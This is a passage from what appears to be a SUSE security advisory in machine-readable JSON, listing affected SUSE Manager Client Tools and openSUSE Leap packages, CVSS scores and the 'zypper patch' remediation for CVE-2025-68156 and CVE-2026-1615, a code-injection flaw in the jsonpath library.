"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T10:11:52Z",
"details": "important"
}
],
"title": "CVE-2025-68156"
},
{
"cve": "CVE-2026-1615",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-1615"
}
],
"notes": [
{
"category": "general",
"text": "Versions of the package jsonpath before 1.2.0 are vulnerable to Arbitrary Code Injection via unsafe evaluation of user-supplied JSON Path expressions. The library relies on the static-eval module to process JSON Path input, which is not designed to handle untrusted data safely. An attacker can exploit this vulnerability by supplying a malicious JSON Path expression that, when evaluated, executes arbitrary JavaScript code, leading to Remote Code Execution in Node.js environments or Cross-site Scripting (XSS) in browser contexts. This affects all methods that evaluate JSON Paths against objects, including .query, .nodes, .paths, .value, .parent, and .apply.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-1615",
"url": "https://www.suse.com/security/cve/CVE-2026-1615"
},
{
"category": "external",
"summary": "SUSE Bug 1257897 for CVE-2026-1615",
"url": "https://bugzilla.suse.com/1257897"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T10:11:52Z",
"details": "critical"
}
],
"title": "CVE-2026-1615"
},
{
"cve": "CVE-2026-21720",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-21720"
}
],
"notes": [
{
"category": "general",
